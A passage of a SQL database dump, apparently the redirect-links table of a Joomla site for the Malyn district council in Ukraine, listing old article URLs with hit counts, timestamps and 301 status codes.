02:49:17','0000-00-00 00:00:00',301),(20952,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=709:2012-06-14-15-04-11&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:49:21','0000-00-00 00:00:00',301),(20953,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1190:------------2014--&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:49:32','0000-00-00 00:00:00',301),(20954,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=696:-14-6-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:50:19','0000-00-00 00:00:00',301),(20955,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1189:2014-01-28-09-46-45&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:50:28','0000-00-00 00:00:00',301),(20956,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1024:-l-2011-2014-r-&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:50:32','0000-00-00 00:00:00',301),(20957,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=737:2012-07-18-13-36-46&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:50:36','0000-00-00 00:00:00',301),(20958,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=665:-75-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:50:44','0000-00-00 00:00:00',301),(20959,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=866:2012-12-14-06-58-01&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:50:48','0000-00-00 00:00:00',301),(20960,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1189:2014-01-28-09-46-45&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:51:10','0000-00-00 00:00:00',301),(20961,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=545:2012-01-26-12-06-01&Itemid=76&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:51:14','0000-00-00 00:00:00',301),(20962,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:51:18','0000-00-00 00:00:00',301),(20963,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1057:--22072013--2100-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:51:22','0000-00-00 00:00:00',301),(20964,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1093:-2017-&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:51:34','0000-00-00 00:00:00',301),(20965,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1161:2013-12-18-13-34-32&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:51:48','0000-00-00 00:00:00',301),(20966,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1313:2014-05-14-10-00-55&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2015-12-11 02:52:05','0000-00-00 00:00:00',301),(20967,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:52:17','0000-00-00 00:00:00',301),(20968,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=580:-l-r-2012-2016-&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:52:23','0000-00-00 00:00:00',301),(20969,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1064:2013-08-09-07-52-21&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:52:27','0000-00-00 00:00:00',301),(20970,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1174:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:52:38','0000-00-00 00:00:00',301),(20971,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=554:-l-r&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:52:41','0000-00-00 00:00:00',301),(20972,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=944:-l-r-&Itemid=88&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:52:49','0000-00-00 00:00:00',301),(20973,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=958:-2010-2015-&Itemid=88&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:52:57','0000-00-00 00:00:00',301),(20974,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1141:2013-11-26-13-18-12&Itemid=95&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:53:04','0000-00-00 00:00:00',301),(20975,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1192:-2014-2015-&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:53:14','0000-00-00 00:00:00',301),(20976,'http://www.malyn-rayrada.org.ua/index.php?id=51&Itemid=92&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 02:53:26','0000-00-00 00:00:00',301),(20977,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=681:16-13-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:53:30','0000-00-00 00:00:00',301),(20978,'http://www.malyn-rayrada.org.ua/index.php?id=53:--25102013-&Itemid=94&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',3,0,'2015-12-11 02:53:38','0000-00-00 00:00:00',301),(20979,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=503:-2017-&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:53:45','0000-00-00 00:00:00',301),(20980,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=844:------------2013--&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:53:55','0000-00-00 00:00:00',301),(20981,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=418:2011-09-29-08-40-03&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:53:59','0000-00-00 00:00:00',301),(20982,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=872:2012-12-17-18-45-20&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:54:10','0000-00-00 00:00:00',301),(20983,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=593:-lr&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:54:18','0000-00-00 00:00:00',301),(20984,'http://www.malyn-rayrada.org.ua/index.php?catid=54:--29112013-&id=1151:2013-11-28-14-54-33&Itemid=95&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:54:47','0000-00-00 00:00:00',301),(20985,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=827:2012-11-20-17-44-21&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:54:58','0000-00-00 00:00:00',301),(20986,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1338:2014-06-11-14-18-06&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:55:08','0000-00-00 00:00:00',301),(20987,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=588:2012-02-27-13-48-51&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:55:20','0000-00-00 00:00:00',301),(20988,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=779:2012-10-03-12-34-44&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:55:32','0000-00-00 00:00:00',301),(20989,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1109:2013-10-18-10-25-30&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:55:35','0000-00-00 00:00:00',301),(20990,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=759:2012-09-14-08-35-05&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:55:50','0000-00-00 00:00:00',301),(20991,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=949:2013-03-06-12-51-36&Itemid=88&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:56:05','0000-00-00 00:00:00',301),(20992,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=615:-------26032012495-12&Itemid=77&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:56:22','0000-00-00 00:00:00',301),(20993,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1201:2014-01-31-07-43-11&Itemid=97&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:56:35','0000-00-00 00:00:00',301),(20994,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=908:2013-01-21-08-58-40&Itemid=86&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:56:42','0000-00-00 00:00:00',301),(20995,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:56:46','0000-00-00 00:00:00',301),(20996,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1151:2013-11-28-14-54-33&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:56:50','0000-00-00 00:00:00',301),(20997,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1125:2013-10-31-07-20-16&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:56:57','0000-00-00 00:00:00',301),(20998,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1078:-----------------2007-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:57:14','0000-00-00 00:00:00',301),(20999,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=910:-22-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:57:17','0000-00-00 00:00:00',301),(21000,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=327:2011-05-20-16-20-26&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:57:33','0000-00-00 00:00:00',301),(21001,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1088:2013-09-19-12-06-07&Itemid=94&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 02:57:40','0000-00-00 00:00:00',301),(21002,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=609:-q-q&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:57:44','0000-00-00 00:00:00',301),(21003,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1121:-24-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:58:00','0000-00-00 00:00:00',301),(21004,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1047:2013-07-10-05-51-36&Itemid=92&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:58:15','0000-00-00 00:00:00',301),(21005,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=804:2012-10-28-18-37-40&Itemid=&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 02:58:18','0000-00-00 00:00:00',301),(21006,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1062:2013-07-29-13-33-29&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:58:22','0000-00-00 00:00:00',301),(21007,'http://www.malyn-rayrada.org.ua/index.php?catid=10&id=1290:2014-04-23-06-56-41&Itemid=17&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:58:46','0000-00-00 00:00:00',301),(21008,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=701:-------------2011-2017-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:58:49','0000-00-00 00:00:00',301),(21009,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1043:-2013-&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:58:53','0000-00-00 00:00:00',301),(21010,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=698:-6-16112010-5-&Itemid=82&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 02:59:03','0000-00-00 00:00:00',301),(21011,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=501:2011-12-14-13-07-32&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:59:23','0000-00-00 00:00:00',301),(21012,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1146:2013-11-27-10-09-00&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 02:59:26','0000-00-00 00:00:00',301),(21013,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1299:--------lr---&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 02:59:30','0000-00-00 00:00:00',301),(21014,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:59:34','0000-00-00 00:00:00',301),(21015,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=451:-2011-2015-&Itemid=73&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:59:41','0000-00-00 00:00:00',301),(21016,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1070:2013-08-23-04-27-00&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:59:44','0000-00-00 00:00:00',301),(21017,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=982:2013-04-03-11-58-18&Itemid=88&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 02:59:50','0000-00-00 00:00:00',301),(21018,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=734:-6-2012-&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 02:59:53','0000-00-00 00:00:00',301),(21019,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=705:-l-r&Itemid=82&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 02:59:57','0000-00-00 00:00:00',301),(21020,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=430:14-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:00:00','0000-00-00 00:00:00',301),(21021,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=644:2012-04-04-09-52-48&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:00:22','0000-00-00 00:00:00',301),(21022,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1056:-22-&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:00:26','0000-00-00 00:00:00',301),(21023,'http://www.malyn-rayrada.org.ua/index.php?catid=52:--16082013-&id=1067:2013-08-16-15-28-50&Itemid=93&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 03:00:36','0000-00-00 00:00:00',301),(21024,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1171:2014-01-11-09-58-40&Itemid=0&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:00:43','0000-00-00 00:00:00',301),(21025,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=647:2012-04-09-08-35-02&Itemid=80&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:00:46','0000-00-00 00:00:00',301),(21026,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',2,0,'2015-12-11 03:01:25','0000-00-00 00:00:00',301),(21027,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1332:2014-06-04-09-44-02&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:01:35','0000-00-00 00:00:00',301),(21028,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1181:2014-01-22-06-06-13&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:01:39','0000-00-00 00:00:00',301),(21029,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1023:-------l---28r-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:01:42','0000-00-00 00:00:00',301),(21030,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=84&lang=ru','','','',5,0,'2015-12-11 03:01:54','0000-00-00 00:00:00',301),(21031,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=763:2012-09-24-07-57-43&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:01:54','0000-00-00 00:00:00',301),(21032,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=205:--------2011--&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:02:04','0000-00-00 00:00:00',301),(21033,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1208:2014-01-31-13-48-49&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:02:18','0000-00-00 00:00:00',301),(21034,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=714:2012-06-14-15-15-43&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:02:21','0000-00-00 00:00:00',301),(21035,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=773:2012-10-02-06-48-57&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:02:30','0000-00-00 00:00:00',301),(21036,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=311:-v-&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:02:33','0000-00-00 00:00:00',301),(21037,'http://www.malyn-rayrada.org.ua/index.php?catid=49&id=944:-l-r-&Itemid=88&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:02:40','0000-00-00 00:00:00',301),(21038,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1056:-22-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:02:43','0000-00-00 00:00:00',301),(21039,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=938:---------------6612-------626-&Itemid=86&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:02:46','0000-00-00 00:00:00',301),(21040,'http://www.malyn-rayrada.org.ua/index.php?id=56:--03022014-&Itemid=97&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',2,0,'2015-12-11 03:03:01','0000-00-00 00:00:00',301),(21041,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=548:-2011-2015-&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:03:14','0000-00-00 00:00:00',301),(21042,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=343:-2011-&Itemid=68&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:03:17','0000-00-00 00:00:00',301),(21043,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:03:20','0000-00-00 00:00:00',301),(21044,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=605:-l-r-i-iii-&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:03:24','0000-00-00 00:00:00',301),(21045,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=189:2010-12-15-13-21-57&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:03:35','0000-00-00 00:00:00',301),(21046,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1098:2013-09-25-09-34-57&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:03:38','0000-00-00 00:00:00',301),(21047,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=540:-2010-2015-&Itemid=76&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:03:41','0000-00-00 00:00:00',301),(21048,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1071:2013-08-27-14-06-18&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 03:03:48','0000-00-00 00:00:00',301),(21049,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1081:-2013-2017-&Itemid=94&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 03:03:51','0000-00-00 00:00:00',301),(21050,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=794:-lr&Itemid=84&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:03:54','0000-00-00 00:00:00',301),(21051,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=910:-22-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:03:57','0000-00-00 00:00:00',301),(21052,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=412:------165------&Itemid=70&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:04:13','0000-00-00 00:00:00',301),(21053,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=850:------2013-&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:04:16','0000-00-00 00:00:00',301),(21054,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=824:-2012-&Itemid=84&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:04:19','0000-00-00 00:00:00',301),(21055,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=579:-2011-2015-&Itemid=77&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:04:22','0000-00-00 00:00:00',301),(21056,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:04:28','0000-00-00 00:00:00',301),(21057,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=193:------------2009-2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:04:34','0000-00-00 00:00:00',301),(21058,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=489:2011-12-02-06-51-07&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:04:37','0000-00-00 00:00:00',301),(21059,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=670:2012-05-08-05-15-51&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:04:40','0000-00-00 00:00:00',301),(21060,'http://www.malyn-rayrada.org.ua/index.php?catid=44&id=757:2012-09-12-09-47-49&Itemid=83&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:04:46','0000-00-00 00:00:00',301),(21061,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=506:-lr&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:05:01','0000-00-00 00:00:00',301),(21062,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&Itemid=0&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:05:10','0000-00-00 00:00:00',301),(21063,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=342:----6----6--15--2011-&Itemid=68&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:05:13','0000-00-00 00:00:00',301),(21064,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=207:2010-12-15-14-22-39&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:05:16','0000-00-00 00:00:00',301),(21065,'http://www.malyn-rayrada.org.ua/index.php?catid=49:--12042013-&id=982:2013-04-03-11-58-18&Itemid=88&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:05:19','0000-00-00 00:00:00',301),(21066,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=793:2012-10-17-06-29-27&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:05:22','0000-00-00 00:00:00',301),(21067,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=451:-2011-2015-&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:05:34','0000-00-00 00:00:00',301),(21068,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=999:2013-04-28-05-21-05&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:05:38','0000-00-00 00:00:00',301),(21069,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=897:2013-01-18-07-40-55&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:06:06','0000-00-00 00:00:00',301),(21070,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=833:2012-11-30-06-51-18&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:06:10','0000-00-00 00:00:00',301),(21071,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=665:-75-&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:06:16','0000-00-00 00:00:00',301),(21072,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=634:-2016-&Itemid=70&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:06:19','0000-00-00 00:00:00',301),(21073,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=780:2012-10-04-07-48-30&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:06:25','0000-00-00 00:00:00',301),(21074,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1172:2014-01-14-14-46-07&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:06:37','0000-00-00 00:00:00',301),(21075,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=620:2012-03-29-10-03-40&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:06:49','0000-00-00 00:00:00',301),(21076,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1100:2013-10-02-18-03-10&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:07:03','0000-00-00 00:00:00',301),(21077,'http://www.malyn-rayrada.org.ua/index.php?catid=34&id=343:-2011-&Itemid=68&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:07:15','0000-00-00 00:00:00',301),(21078,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=747:2012-08-03-09-21-28&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:07:26','0000-00-00 00:00:00',301),(21079,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1011:2013-05-29-09-51-28&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:07:29','0000-00-00 00:00:00',301),(21080,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=689:2012-05-29-17-48-13&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:07:32','0000-00-00 00:00:00',301),(21081,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=665:-75-&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:07:35','0000-00-00 00:00:00',301),(21082,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1335:2014-06-07-10-58-30&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:07:41','0000-00-00 00:00:00',301),(21083,'http://www.malyn-rayrada.org.ua/index.php?id=49&Itemid=88&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',4,0,'2015-12-11 03:07:44','0000-00-00 00:00:00',301),(21084,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=832:-9-2012-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:08:15','0000-00-00 00:00:00',301),(21085,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=787:2012-10-15-09-13-25&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:08:18','0000-00-00 00:00:00',301),(21086,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=742:-14-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:08:25','0000-00-00 00:00:00',301),(21087,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1187:2014-01-28-09-43-51&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:08:43','0000-00-00 00:00:00',301),(21088,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=940:2013-02-21-14-02-14&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:08:46','0000-00-00 00:00:00',301),(21089,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=804:2012-10-28-18-37-40&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:08:48','0000-00-00 